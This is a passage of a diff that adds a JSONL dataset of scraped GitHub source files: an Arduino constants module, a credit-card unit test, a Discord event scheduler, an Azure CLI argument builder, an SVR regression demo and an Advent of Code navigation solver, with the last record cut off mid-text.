diff --git "a/293.jsonl" "b/293.jsonl"
new file mode 100644--- /dev/null
+++ "b/293.jsonl"
@@ -0,0 +1,2271 @@
+{"seq_id":"12421809764","text":"from os import environ\nDEBUG = environ.get('DEBUG', False)\n\nARDUINO_DEV_PATH = environ.get('DBX_ARDUINO_DEV', \"/dev/ttyACM0\")\nARDUINO_BAUD_RATE = environ.get('DBX_ARDUINO_BAUD', 9600)\n\nCMD_SET_LED = \"set_led\"\nCMD_SET_TEXT = \"set_text\"\nCMD_PARTY_LEDS = \"party_leds\"\n\n# List of command names (and formats for their associated arguments). These must\n# be in the same order as in the sketch.\nCOMMANDS = [[CMD_SET_LED, \"IIIII\"],\n [CMD_SET_TEXT, \"Is\"],\n [CMD_PARTY_LEDS, \"\"]]\n\n\nWHITE_RGB = [255, 255, 255]\nBLACK_RGB = [0, 0, 0]\nDBX_BLUE_RGB = [0, 97, 255]\nAVAILABLE_RGB = [0, 128, 0]\nFLOW_RGB = DBX_BLUE_RGB\nMAX_BRIGHTNESS = 255\n\nNUM_LED = 22\n","repo_name":"michaelprobinette/dbx-status-cube","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11223495553","text":"import unittest\n\nfrom unittest.mock import AsyncMock\nfrom src.domain.use_cases.create_new_creditcard_use_case import CreateNewCreditCardUseCase, CreateNewCreditCardDTOOut\nfrom src.domain.use_cases.dtos.creditcard_dtos import CreateNewCreditCardDTOIn\nfrom src.domain.factories.creditcard_factory import CreditCardFactory\nfrom src.domain.ports.outbound.protocol_repositories.creditcard_repository import ICreditCardRepository\n\n\nclass TestCreateNewCreditCardUseCase(unittest.TestCase):\n def setUp(self):\n # Create a mock for the repository\n self.mock_repository = AsyncMock(spec=ICreditCardRepository)\n\n # Create a use case instance with the mock repository\n self.use_case = CreateNewCreditCardUseCase(rep=self.mock_repository)\n self.input_data = CreateNewCreditCardDTOIn(\n exp_date=\"02/2026\",\n holder=\"Fulano\",\n number=\"4539578763621486\",\n cvv=\"123\"\n )\n self.output_date = CreateNewCreditCardDTOOut(\n identification=\"12313\",\n exp_date='2026-02-28',\n holder='FULANO',\n number='gAAA',\n cvv=123,\n brand=\"visa\"\n )\n self.credit_card = CreditCardFactory().create(self.input_data)\n self.mock_repository.create.return_value = self.credit_card\n\n async def test_create_new_credit_card(self):\n result = await self.use_case.create(self.input_data)\n self.output_date.identification = result.identification\n self.output_date.number = result.number\n self.assertEqual(result, self.output_date)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"GuiCastroo/CreditCardMaisTodos","sub_path":"src/tests/unittests/test_use_cases/test_create_new_credit_card_use_case.py","file_name":"test_create_new_credit_card_use_case.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"38724089161","text":"import asyncio\nfrom functools import wraps\nfrom typing import List, Dict, Callable\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom threading import Timer, RLock\nfrom api.dbmodels.event import Event\nfrom usermanager import UserManager\nimport utils\nimport logging\nfrom api.database import db\nimport discord\n\n\n@dataclass\nclass FutureCallback:\n time: datetime\n callback: Callable\n\n\nclass EventManager:\n\n def __init__(self, discord_client: discord.Client):\n self._scheduled: List[FutureCallback] = []\n self._schedule_lock = RLock()\n self._cur_timer = None\n self._user_manager = UserManager()\n self._dc_client = discord_client\n\n def initialize_events(self):\n events = Event.query.all()\n for event in events:\n self.register(event)\n\n def register(self, event: Event):\n event_callbacks = [\n (event.start, lambda: self._event_start(event)),\n (event.end, lambda: self._event_end(event)),\n (event.registration_start, lambda: self._event_registration_start(event)),\n (event.registration_end, lambda: self._event_registration_end(event))\n ]\n now = datetime.now()\n for time, callback in event_callbacks:\n if time > now:\n self._schedule(\n FutureCallback(\n time=time,\n callback=self._wrap_async(callback)\n )\n )\n\n def _get_event_channel(self, event: Event) -> discord.TextChannel:\n guild = self._dc_client.get_guild(event.guild_id)\n return guild.get_channel(event.channel_id)\n\n async def _event_start(self, event: Event):\n self._user_manager.synch_workers()\n await self._get_event_channel(event).send(content=f'Event **{event.name}** just started!',\n embed=event.get_discord_embed(dc_client=self._dc_client, registrations=True))\n\n async def _event_end(self, event: Event):\n await self._get_event_channel(event).send(\n content=f'Event **{event.name}** just ended! Final standings:',\n embed=await event.create_leaderboard(self._dc_client)\n )\n\n complete_history = await event.create_complete_history(dc_client=self._dc_client)\n await self._get_event_channel(event).send(\n embed=event.get_summary_embed(dc_client=self._dc_client).set_image(url=f'attachment://{complete_history.filename}'),\n file=complete_history\n )\n\n self._user_manager.synch_workers()\n\n async def _event_registration_start(self, event: Event):\n await self._get_event_channel(event).send(content=f'Registration period for **{event.name}** has started!')\n\n async def _event_registration_end(self, event: Event):\n await self._get_event_channel(event).send(content=f'Registration period for **{event.name}** has ended!')\n\n def _wrap_async(self, coro):\n @wraps(coro)\n def func():\n self._dc_client.loop.create_task(coro())\n return func\n\n def _schedule(self, callback: FutureCallback):\n with self._schedule_lock:\n self._scheduled.append(callback)\n if len(self._scheduled) == 1:\n self._cur_timer = asyncio.create_task(self._execute())\n else:\n # Execution has to be restarted if the callback to schedule happens before the current waiting callback\n if callback.time < self._scheduled[0].time:\n self._cur_timer.cancel()\n self._scheduled.sort(key=lambda x: x.time)\n self._cur_timer = asyncio.create_task(self._execute())\n else:\n self._scheduled.sort(key=lambda x: x.time)\n\n async def _execute(self):\n while len(self._scheduled) > 0:\n cur_event = self._scheduled[0]\n diff_seconds = (cur_event.time - datetime.now()).total_seconds()\n await asyncio.sleep(diff_seconds)\n\n try:\n cur_event.callback()\n except Exception as e:\n logging.error(f'Unhandled exception during event callback {cur_event.callback}: {e}')\n if cur_event in self._scheduled:\n self._scheduled.remove(cur_event)\n","repo_name":"jackstar12/balance-bot","sub_path":"eventmanager.py","file_name":"eventmanager.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"40172664750","text":"import re\n\nimport inflect\nfrom utils.case import to_camel_case\n\nfrom ._arg import CMDArg, CMDArgBase, CMDArgumentHelp, CMDArgEnum, CMDArgDefault, CMDBooleanArgBase, \\\n CMDArgBlank, CMDObjectArgAdditionalProperties, CMDResourceLocationArgBase, CMDClsArgBase, CMDPasswordArgPromptInput\nfrom ._format import CMDFormat\nfrom ._schema import CMDObjectSchema, CMDSchema, CMDSchemaBase, CMDObjectSchemaBase, CMDObjectSchemaDiscriminator, \\\n CMDArraySchemaBase, CMDObjectSchemaAdditionalProperties, CMDResourceIdSchema, CMDBooleanSchemaBase, \\\n CMDResourceLocationSchemaBase, CMDPasswordSchema\n\n\nclass CMDArgBuilder:\n _inflect_engine = inflect.engine()\n\n @classmethod\n def new_builder(cls, schema, parent=None, var_prefix=None, ref_args=None, ref_arg=None, is_update_action=False):\n if var_prefix is None:\n if parent is None or parent._arg_var is None:\n arg_var = \"$\"\n else:\n arg_var = parent._arg_var\n else:\n arg_var = var_prefix\n\n if parent is None or parent._arg_var is None:\n if isinstance(schema, CMDSchema):\n if not arg_var.endswith(\"$\") and not schema.name.startswith('[') and not schema.name.startswith('{'):\n arg_var += '.'\n arg_var += f'{schema.name}'.replace('$', '') # some schema name may contain $\n else:\n raise NotImplementedError()\n else:\n assert isinstance(parent, CMDArgBuilder)\n if isinstance(parent.schema, CMDArraySchemaBase):\n arg_var += '[]'\n elif isinstance(parent.schema, CMDObjectSchemaAdditionalProperties):\n arg_var += '{}'\n elif isinstance(parent.schema, (CMDObjectSchemaBase, CMDObjectSchemaDiscriminator)):\n if not isinstance(schema, CMDObjectSchemaAdditionalProperties):\n if not arg_var.endswith(\"$\"):\n arg_var += '.'\n if isinstance(schema, CMDObjectSchemaDiscriminator):\n arg_var += schema.get_safe_value()\n elif isinstance(schema, CMDSchema):\n arg_var += f'{schema.name}'.replace('$', '') # some schema name may contain $\n else:\n raise NotImplementedError()\n else:\n raise NotImplementedError()\n cls_name = getattr(parent.schema, 'cls', None)\n if cls_name is not None:\n arg_var = arg_var.replace(parent._arg_var, f\"@{cls_name}\")\n\n if ref_arg:\n assert ref_args is None\n\n flatten = None\n sub_ref_args = []\n if not ref_arg and ref_args:\n for arg in ref_args:\n if arg.var == arg_var:\n ref_arg = arg\n flatten = False\n break\n elif arg.var.startswith(f\"{arg_var}.\"):\n flatten = True # this argument already flattened\n sub_ref_args.append(arg)\n sub_ref_args = sub_ref_args or None\n return cls(schema=schema, arg_var=arg_var, ref_arg=ref_arg, sub_ref_args=sub_ref_args, parent=parent, is_update_action=is_update_action, flatten=flatten)\n\n def __init__(self, schema, arg_var, ref_arg, sub_ref_args, parent=None, is_update_action=False, flatten=None):\n self.schema = schema\n self._parent = parent\n self._arg_var = arg_var\n self._ref_arg = ref_arg\n self._sub_ref_args = sub_ref_args\n self._flatten = flatten\n self._flatten_discriminators = False # flatten it's discriminators or not\n self._is_update_action = is_update_action\n\n def get_sub_builder(self, schema, ref_args=None, ref_arg=None):\n return self.new_builder(\n schema=schema, parent=self, ref_args=ref_args, ref_arg=ref_arg, is_update_action=self._is_update_action)\n\n def _ignore(self):\n if self.schema.frozen:\n return True\n if isinstance(self.schema, CMDSchemaBase):\n assert not self.schema.read_only\n if self.schema.const:\n return True\n return False\n\n def _build_arg_base(self):\n if self._ignore():\n return None\n arg_cls = self.schema.ARG_TYPE\n assert issubclass(arg_cls, (CMDArgBase, CMDObjectArgAdditionalProperties))\n return arg_cls.build_arg_base(self)\n\n def _build_arg(self):\n if self._ignore():\n return None\n\n arg_cls = self.schema.ARG_TYPE\n assert issubclass(arg_cls, CMDArg)\n return arg_cls.build_arg(self)\n\n def _need_flatten(self):\n if isinstance(self.schema, CMDObjectSchema):\n if self.get_cls():\n # not support to flatten object which is a cls.\n return False\n if self._flatten is not None:\n return self._flatten\n if self.schema.client_flatten:\n return True\n if self.schema.name == \"properties\" and self.schema.props:\n # flatten 'properties' property by default if it has props\n return True\n if isinstance(self.schema, CMDObjectSchemaDiscriminator):\n return self._parent._flatten_discriminators\n return False\n\n def get_args(self):\n if self._ignore():\n return []\n\n arg = self._build_arg()\n assert arg is not None\n if self._need_flatten():\n if isinstance(self.schema, CMDSchema):\n self.schema.arg = None\n if arg.args:\n for sub_arg in arg.args:\n if sub_arg.group is None:\n sub_arg.group = to_camel_case(self.schema.name)\n if not arg.required:\n sub_arg.required = False\n return arg.args or []\n elif isinstance(self.schema, CMDSchema):\n self.schema.arg = arg.var\n arg.ref_schema = self.schema\n\n return [arg, ]\n\n def get_sub_args(self):\n assert isinstance(self.schema, (CMDObjectSchemaBase, CMDObjectSchemaDiscriminator))\n sub_args = []\n discriminator_mapping = {}\n if self._ref_arg:\n if isinstance(self._ref_arg, CMDClsArgBase):\n # use the linked instance\n unwrapped_ref_arg = self._ref_arg.get_unwrapped()\n assert unwrapped_ref_arg is not None\n sub_ref_args = unwrapped_ref_arg.args\n else:\n sub_ref_args = self._ref_arg.args\n else:\n sub_ref_args = self._sub_ref_args\n\n if self.schema.discriminators:\n # update self._flatten_discriminators, if any discriminator need flatten, then all discriminator needs to flatten\n for disc in self.schema.discriminators:\n sub_builder = self.get_sub_builder(schema=disc, ref_args=sub_ref_args)\n self._flatten_discriminators = self._flatten_discriminators or sub_builder._need_flatten()\n for disc in self.schema.discriminators:\n sub_builder = self.get_sub_builder(schema=disc, ref_args=sub_ref_args)\n results = sub_builder.get_args()\n sub_args.extend(results)\n if results and not self._flatten_discriminators:\n assert len(results) == 1\n if disc.property not in discriminator_mapping:\n discriminator_mapping[disc.property] = {}\n discriminator_mapping[disc.property][disc.value] = results[0].var\n\n if self.schema.props:\n for prop in self.schema.props:\n if prop.name in discriminator_mapping:\n # If discriminators are not flattened then prop value can be associate with discriminator arguments\n assert hasattr(prop, 'enum')\n for item in prop.enum.items:\n if item.value in discriminator_mapping[prop.name]:\n item.arg = discriminator_mapping[prop.name][item.value]\n continue\n sub_builder = self.get_sub_builder(schema=prop, ref_args=sub_ref_args)\n sub_args.extend(sub_builder.get_args())\n\n if not sub_args:\n return None\n return sub_args\n\n def get_sub_item(self):\n if hasattr(self.schema, \"item\") and self.schema.item:\n sub_ref_arg = self._ref_arg.item if self._ref_arg else None\n sub_builder = self.get_sub_builder(schema=self.schema.item, ref_arg=sub_ref_arg)\n return sub_builder._build_arg_base()\n else:\n return None\n\n def get_any_type(self):\n if hasattr(self.schema, \"any_type\") and self.schema.any_type and self.get_sub_item() is None:\n return True\n else:\n return False\n\n def get_additional_props(self):\n if hasattr(self.schema, \"additional_props\") and self.schema.additional_props:\n sub_ref_arg = self._ref_arg.additional_props if self._ref_arg else None\n sub_builder = self.get_sub_builder(schema=self.schema.additional_props, ref_arg=sub_ref_arg)\n return sub_builder._build_arg_base()\n else:\n return None\n\n def get_required(self):\n if not self._is_update_action and isinstance(self.schema, CMDSchema):\n return self.schema.required\n return False\n\n def get_nullable(self):\n if isinstance(self.schema, CMDSchemaBase) and self.schema.nullable:\n return True\n\n if isinstance(self.schema, CMDSchema):\n # when updated and schema is not required then nullable is true.\n # This can help update command to remove properties\n if not self.schema.required and self._is_update_action:\n return True\n\n elif isinstance(self.schema, CMDSchemaBase):\n # when updated and the element is nullable\n # This can help update command to remove elements.\n if self._is_update_action:\n return True\n\n return False\n\n def get_default(self):\n if self._ref_arg:\n # ref_arg already has default value return it\n if self._ref_arg.default:\n return CMDArgDefault(raw_data=self._ref_arg.default.to_native())\n if self._is_update_action:\n # ignore default for update actions\n return None\n if hasattr(self.schema, 'default') and self.schema.default:\n return CMDArgDefault.build_default(self, self.schema.default)\n return None\n\n def get_configuration_key(self):\n if self._ref_arg:\n return self._ref_arg.configuration_key\n return None\n\n def get_prompt(self):\n if self._ref_arg:\n # ref_arg already has prompt return it\n if hasattr(self._ref_arg, \"prompt\") and self._ref_arg.prompt:\n return self._ref_arg.prompt.__class__(raw_data=self._ref_arg.prompt.to_native())\n if isinstance(self.schema, CMDPasswordSchema):\n return CMDPasswordArgPromptInput(raw_data={\"msg\": \"Password:\"})\n return None\n\n def get_blank(self):\n if self.get_prompt() is not None:\n # disable blank when get prompt is available\n return None\n\n if self._ref_arg:\n if self._ref_arg.blank:\n return CMDArgBlank(raw_data=self._ref_arg.blank.to_native())\n return None # ignore the logic from schema\n\n if isinstance(self.schema, CMDBooleanArgBase):\n blk = CMDArgBlank()\n blk.value = True\n return blk\n return None\n\n def get_hide(self):\n if self._ref_arg:\n return self._ref_arg.hide # ignore the logic from schema\n\n if getattr(self.schema, 'name', None) == 'id' and not self.get_required() and self._parent and \\\n isinstance(self.schema, CMDResourceIdSchema):\n if self._arg_var.split('.', maxsplit=1)[-1] == 'id':\n # hide top level 'id' property when it has 'name' property,\n for prop in self._parent.schema.props:\n if prop.name == 'name':\n return True\n return False\n\n def get_var(self):\n return self._arg_var\n\n @staticmethod\n def _build_option_name(name):\n name = name.replace('_', '-')\n name = re.sub('(.)([A-Z][a-z]+)', r'\\1-\\2', name)\n name = re.sub('([a-z0-9])([A-Z])', r'\\1-\\2', name).lower()\n return '-'.join([p for p in name.split('-') if p])\n\n def get_options(self):\n if self._ref_arg:\n return [*self._ref_arg.options]\n\n if isinstance(self.schema, CMDObjectSchemaDiscriminator):\n opt_name = self._build_option_name(self.schema.get_safe_value())\n elif isinstance(self.schema, CMDSchema):\n name = self.schema.name.replace('$', '')\n if name == \"[Index]\" or name == \"{Key}\":\n assert self._arg_var.endswith(name)\n prefix = self._arg_var[:-len(name)].split('.')[-1]\n prefix = self._inflect_engine.singular_noun(prefix)\n if name == \"[Index]\":\n name = f'{prefix}-index'\n elif name == \"{Key}\":\n name = f'{prefix}-key'\n elif name.startswith('[].') or name.startswith('{}.'):\n assert self._arg_var.endswith(name)\n prefix = self._arg_var[:-len(name)].split('.')[-1]\n prefix = self._inflect_engine.singular_noun(prefix)\n name = prefix + name[2:]\n name = name.replace('.', '-')\n opt_name = self._build_option_name(name) # some schema name may contain $\n else:\n raise NotImplementedError()\n return [opt_name, ]\n\n def get_singular_options(self):\n if self._ref_arg:\n singular_options = getattr(self._ref_arg, 'singular_options', None)\n if singular_options:\n return [*singular_options]\n\n # Disable singular options by default\n # if isinstance(self.schema, CMDArraySchema):\n # opt_name = self._build_option_name(self.schema.name.replace('$', '')) # some schema name may contain $\n # singular_opt_name = self._inflect_engine.singular_noun(opt_name) or opt_name\n # if singular_opt_name != opt_name:\n # return [singular_opt_name, ]\n return None\n\n def get_help(self):\n if self._ref_arg:\n if self._ref_arg.help:\n return CMDArgumentHelp(raw_data=self._ref_arg.help.to_native())\n\n if hasattr(self.schema, 'description') and self.schema.description:\n h = CMDArgumentHelp()\n h.short = self.schema.description.replace('\\n', ' ')\n return h\n return None\n\n def get_group(self):\n if self._ref_arg:\n return self._ref_arg.group\n return None\n\n def get_fmt(self):\n if isinstance(self.schema, CMDObjectSchemaDiscriminator):\n return None\n assert hasattr(self.schema, 'fmt')\n if self.schema.fmt:\n assert isinstance(self.schema.fmt, CMDFormat)\n ref_fmt = getattr(self._ref_arg, 'fmt', None) if self._ref_arg else None\n return self.schema.fmt.build_arg_fmt(self, ref_fmt=ref_fmt)\n return None\n\n def get_enum(self):\n assert hasattr(self.schema, 'enum')\n if self.schema.enum:\n ref_enum = self._ref_arg.enum if self._ref_arg else None\n enum = CMDArgEnum.build_enum(self.schema.enum, ref_enum=ref_enum)\n return enum\n return None\n\n def get_cls(self):\n if isinstance(self.schema, CMDObjectSchemaDiscriminator):\n return None\n assert hasattr(self.schema, 'cls')\n return self.schema.cls\n\n def get_type(self):\n return self.schema._get_type()\n\n def get_reverse_boolean(self):\n assert isinstance(self.schema, CMDBooleanSchemaBase)\n if self._ref_arg and isinstance(self._ref_arg, CMDBooleanArgBase):\n return self._ref_arg.reverse\n return False\n\n def get_resource_location_no_rg_default(self):\n assert isinstance(self.schema, CMDResourceLocationSchemaBase)\n if self._ref_arg and isinstance(self._ref_arg, CMDResourceLocationArgBase):\n return self._ref_arg.no_rg_default\n return False\n","repo_name":"Azure/aaz-dev-tools","sub_path":"src/aaz_dev/command/model/configuration/_arg_builder.py","file_name":"_arg_builder.py","file_ext":"py","file_size_in_byte":16496,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"}
+{"seq_id":"13219825166","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Hiromasa Kaneko\n\"\"\"\n# Demonstration of Variable Importance-considering Support Vector Regression (VI-SVR) \n\nimport math\n\nimport matplotlib.figure as figure\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.datasets import load_boston\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import GridSearchCV, train_test_split, cross_val_predict\n\nfrom scipy.spatial.distance import cdist\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\nrate_of_test_samples = 0.25 # rate of the number of test samples\nfold_number = 5 # fold number in cross-validation (CV)\nnonlinear_svr_cs = 2 ** np.arange(-5, 10, dtype=float) # C for nonlinear svr\nnonlinear_svr_epsilons = 2 ** np.arange(-10, 0, dtype=float) # Epsilon for nonlinear svr\nnonlinear_svr_gammas = 2 ** np.arange(-20, 10, dtype=float) # Gamma for nonlinear svr\nrandom_forest_number_of_trees = 500 # Number of decision trees for random forest\nrandom_forest_x_variables_rates = np.arange(1, 10, dtype=float) / 10 # Ratio of the number of X-variables for random forest\nweights_of_feature_importances = list(np.arange(0, 3.1, 0.1)) # p in VI-SVR\n\nx, y = load_boston(return_X_y=True)\nx = pd.DataFrame(x)\ny = pd.Series(y)\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=rate_of_test_samples, shuffle=True)\n \n# autoscaling\nautoscaled_x_train = (x_train - x_train.mean(axis=0)) / x_train.std(axis=0, ddof=1)\nautoscaled_y_train = (y_train - y_train.mean()) / y_train.std(ddof=1)\nautoscaled_x_test = (x_test - x_train.mean(axis=0)) / x_train.std(axis=0, ddof=1)\n \n# VI-SVR\nrmse_oob_all = []\nfor random_forest_x_variables_rate in random_forest_x_variables_rates:\n RandomForestResult = RandomForestRegressor(n_estimators=random_forest_number_of_trees, max_features=int(\n max(math.ceil(x_train.shape[1] * random_forest_x_variables_rate), 1)), oob_score=True)\n RandomForestResult.fit(autoscaled_x_train, autoscaled_y_train)\n estimated_y_in_cv = RandomForestResult.oob_prediction_\n estimated_y_in_cv = estimated_y_in_cv * y_train.std(ddof=1) + y_train.mean()\n rmse_oob_all.append((sum((y_train - estimated_y_in_cv) ** 2) / len(y_train)) ** 0.5)\noptimal_random_forest_x_variables_rate = random_forest_x_variables_rates[\n np.where(rmse_oob_all == np.min(rmse_oob_all))[0][0]]\nregression_model = RandomForestRegressor(n_estimators=random_forest_number_of_trees, max_features=int(\n max(math.ceil(x_train.shape[1] * optimal_random_forest_x_variables_rate), 1)), oob_score=True)\nregression_model.fit(autoscaled_x_train, autoscaled_y_train)\nfeature_importances = pd.DataFrame(regression_model.feature_importances_ / max(regression_model.feature_importances_), index=x_train.columns)\n\nautoscaled_x_train_original = autoscaled_x_train.copy()\nr2cvs = []\nfor weight in weights_of_feature_importances:\n autoscaled_x_train = autoscaled_x_train_original * (feature_importances.iloc[:, 0] ** weight)\n # svr\n variance_of_gram_matrix = []\n numpy_autoscaled_x_train = np.array(autoscaled_x_train)\n for nonlinear_svr_gamma in nonlinear_svr_gammas:\n gram_matrix = np.exp(-nonlinear_svr_gamma * cdist(numpy_autoscaled_x_train, numpy_autoscaled_x_train, metric='sqeuclidean'))\n variance_of_gram_matrix.append(gram_matrix.var(ddof=1))\n optimal_nonlinear_gamma = nonlinear_svr_gammas[\n np.where(variance_of_gram_matrix == np.max(variance_of_gram_matrix))[0][0]]\n # optimize ε with CV\n model_in_cv = GridSearchCV(svm.SVR(kernel='rbf', C=3, gamma=optimal_nonlinear_gamma), {'epsilon': nonlinear_svr_epsilons},\n cv=fold_number, verbose=0)\n model_in_cv.fit(autoscaled_x_train, autoscaled_y_train)\n optimal_nonlinear_epsilon = model_in_cv.best_params_['epsilon']\n # optimize C with CV\n model_in_cv = GridSearchCV(svm.SVR(kernel='rbf', epsilon=optimal_nonlinear_epsilon, gamma=optimal_nonlinear_gamma),\n {'C': nonlinear_svr_cs}, cv=fold_number, verbose=0)\n model_in_cv.fit(autoscaled_x_train, autoscaled_y_train)\n optimal_nonlinear_c = model_in_cv.best_params_['C']\n # optimize γ with CV\n model_in_cv = GridSearchCV(svm.SVR(kernel='rbf', epsilon=optimal_nonlinear_epsilon, C=optimal_nonlinear_c),\n {'gamma': nonlinear_svr_gammas}, cv=fold_number, verbose=0)\n model_in_cv.fit(autoscaled_x_train, autoscaled_y_train)\n optimal_nonlinear_gamma = model_in_cv.best_params_['gamma']\n regression_model = svm.SVR(kernel='rbf', C=optimal_nonlinear_c, epsilon=optimal_nonlinear_epsilon,\n gamma=optimal_nonlinear_gamma)\n regression_model.fit(autoscaled_x_train, autoscaled_y_train)\n estimated_y_in_cv = np.ndarray.flatten(\n cross_val_predict(regression_model, autoscaled_x_train, autoscaled_y_train, cv=fold_number))\n r2cvs.append(float(1 - sum((autoscaled_y_train - estimated_y_in_cv) ** 2) / sum((autoscaled_y_train - autoscaled_y_train.mean()) ** 2)))\n \noptimal_weight = weights_of_feature_importances[np.where(r2cvs == np.max(r2cvs))[0][0]]\nprint(optimal_weight)\nautoscaled_x_train = autoscaled_x_train_original * (feature_importances.iloc[:, 0] ** optimal_weight)\nautoscaled_x_test = autoscaled_x_test * (feature_importances.iloc[:, 0] ** optimal_weight)\n# svr\nvariance_of_gram_matrix = list()\nnumpy_autoscaled_x_train = np.array(autoscaled_x_train)\nfor nonlinear_svr_gamma in nonlinear_svr_gammas:\n gram_matrix = np.exp(-nonlinear_svr_gamma * cdist(numpy_autoscaled_x_train, numpy_autoscaled_x_train, metric='sqeuclidean'))\n variance_of_gram_matrix.append(gram_matrix.var(ddof=1))\noptimal_nonlinear_gamma = nonlinear_svr_gammas[\n np.where(variance_of_gram_matrix == np.max(variance_of_gram_matrix))[0][0]]\n# optimize ε with CV\nmodel_in_cv = GridSearchCV(svm.SVR(kernel='rbf', C=3, gamma=optimal_nonlinear_gamma), {'epsilon': nonlinear_svr_epsilons},\n cv=fold_number, verbose=0)\nmodel_in_cv.fit(autoscaled_x_train, autoscaled_y_train)\noptimal_nonlinear_epsilon = model_in_cv.best_params_['epsilon']\n# optimize C with CV\nmodel_in_cv = GridSearchCV(svm.SVR(kernel='rbf', epsilon=optimal_nonlinear_epsilon, gamma=optimal_nonlinear_gamma),\n {'C': nonlinear_svr_cs}, cv=fold_number, verbose=0)\nmodel_in_cv.fit(autoscaled_x_train, autoscaled_y_train)\noptimal_nonlinear_c = model_in_cv.best_params_['C']\n# optimize γ with CV\nmodel_in_cv = GridSearchCV(svm.SVR(kernel='rbf', epsilon=optimal_nonlinear_epsilon, C=optimal_nonlinear_c),\n {'gamma': nonlinear_svr_gammas}, cv=fold_number, verbose=0)\nmodel_in_cv.fit(autoscaled_x_train, autoscaled_y_train)\noptimal_nonlinear_gamma = model_in_cv.best_params_['gamma']\nregression_model = svm.SVR(kernel='rbf', C=optimal_nonlinear_c, epsilon=optimal_nonlinear_epsilon,\n gamma=optimal_nonlinear_gamma)\nregression_model.fit(autoscaled_x_train, autoscaled_y_train)\n\n# calculate y\ncalculated_y_train = np.ndarray.flatten(regression_model.predict(autoscaled_x_train))\ncalculated_y_train = calculated_y_train * y_train.std(ddof=1) + y_train.mean()\n# r2, RMSE, MAE\nprint('r2: {0}'.format(float(1 - sum((y_train - calculated_y_train) ** 2) / sum((y_train - y_train.mean()) ** 2))))\nprint('RMSE: {0}'.format(float((sum((y_train - calculated_y_train) ** 2) / len(y_train)) ** 0.5)))\nprint('MAE: {0}'.format(float(sum(abs(y_train - calculated_y_train)) / len(y_train))))\n# yy-plot\nplt.figure(figsize=figure.figaspect(1))\nplt.scatter(y_train, calculated_y_train)\ny_max = np.max(np.array([np.array(y_train), calculated_y_train]))\ny_min = np.min(np.array([np.array(y_train), calculated_y_train]))\nplt.plot([y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min)],\n [y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min)], 'k-')\nplt.ylim(y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min))\nplt.xlim(y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min))\nplt.xlabel('Actual Y')\nplt.ylabel('Calculated Y')\nplt.show()\n\n# prediction\npredicted_y_test = np.ndarray.flatten(regression_model.predict(autoscaled_x_test))\npredicted_y_test = predicted_y_test * y_train.std(ddof=1) + y_train.mean()\n# yy-plot\nplt.figure(figsize=figure.figaspect(1))\nplt.scatter(y_test, predicted_y_test)\ny_max = np.max(np.array([np.array(y_test), predicted_y_test]))\ny_min = np.min(np.array([np.array(y_test), predicted_y_test]))\nplt.plot([y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min)],\n [y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min)], 'k-')\nplt.ylim(y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min))\nplt.xlim(y_min - 0.05 * (y_max - y_min), y_max + 0.05 * (y_max - y_min))\nplt.xlabel('Actual Y')\nplt.ylabel('Predicted Y')\nplt.show()\n# r2p, RMSEp, MAEp\nprint('r2p: {0}'.format(float(1 - sum((y_test - predicted_y_test) ** 2) / sum((y_test - y_test.mean()) ** 2))))\nprint('RMSEp: {0}'.format(float((sum((y_test - predicted_y_test) ** 2) / len(y_test)) ** 0.5)))\nprint('MAEp: {0}'.format(float(sum(abs(y_test - predicted_y_test)) / len(y_test))))\n","repo_name":"hkaneko1985/dcekit","sub_path":"demo_visvr.py","file_name":"demo_visvr.py","file_ext":"py","file_size_in_byte":9150,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"}
+{"seq_id":"14969745487","text":"import math\nfrom pathlib import Path\n\ny = (1, 0, -1, 0)\nx = (0, 1, 0, -1)\n\ndirs = ('N', 'E', 'S', 'W')\ndirs_coord = dict(zip(dirs, zip(x, y)))\n\n\ndef part1(sequence):\n cx = cy = 0\n curr_dir = dirs.index('E')\n for action, value in sequence:\n if action in dirs_coord:\n dx, dy = dirs_coord[action]\n cx, cy = cx+(dx*value), cy+(dy*value)\n elif action == 'F':\n dx, dy = dirs_coord[dirs[curr_dir]]\n cx, cy = cx+(dx*value), cy+(dy*value)\n else:\n sign = 1 if action == 'R' else -1\n move = (value//90)\n curr_dir = (curr_dir+(sign*move)) % len(dirs)\n\n return abs(cx)+abs(cy)\n\n\ndef part2(sequence):\n\n def rotate(point, angle):\n angle = math.radians(angle)\n (px, py) = point\n px_ = px * math.cos(angle) - py * math.sin(angle)\n py_ = py * math.cos(angle) + px * math.sin(angle)\n return round(px_), round(py_)\n\n cx = cy = 0\n wx, wy = 10, 1\n\n for action, value in sequence:\n if action in dirs_coord:\n dx, dy = dirs_coord[action]\n wx, wy = wx+(dx*value), wy+(dy*value)\n elif action == 'F':\n cx, cy = cx+(wx*value), cy+(wy*value)\n else:\n sign = -1 if action == 'R' else 1\n wx, wy = rotate((wx, wy), sign*value)\n print(action+str(value), f'({cx},{cy})',\n f'({wx},{wy})')\n\n return abs(cx)+abs(cy)\n\n\ndef process_input(file):\n return [(x[0], int(x[1:])) for x in file.read().splitlines()]\n\n\nif __name__ == \"__main__\":\n script_path = Path(__file__).resolve()\n input_path = 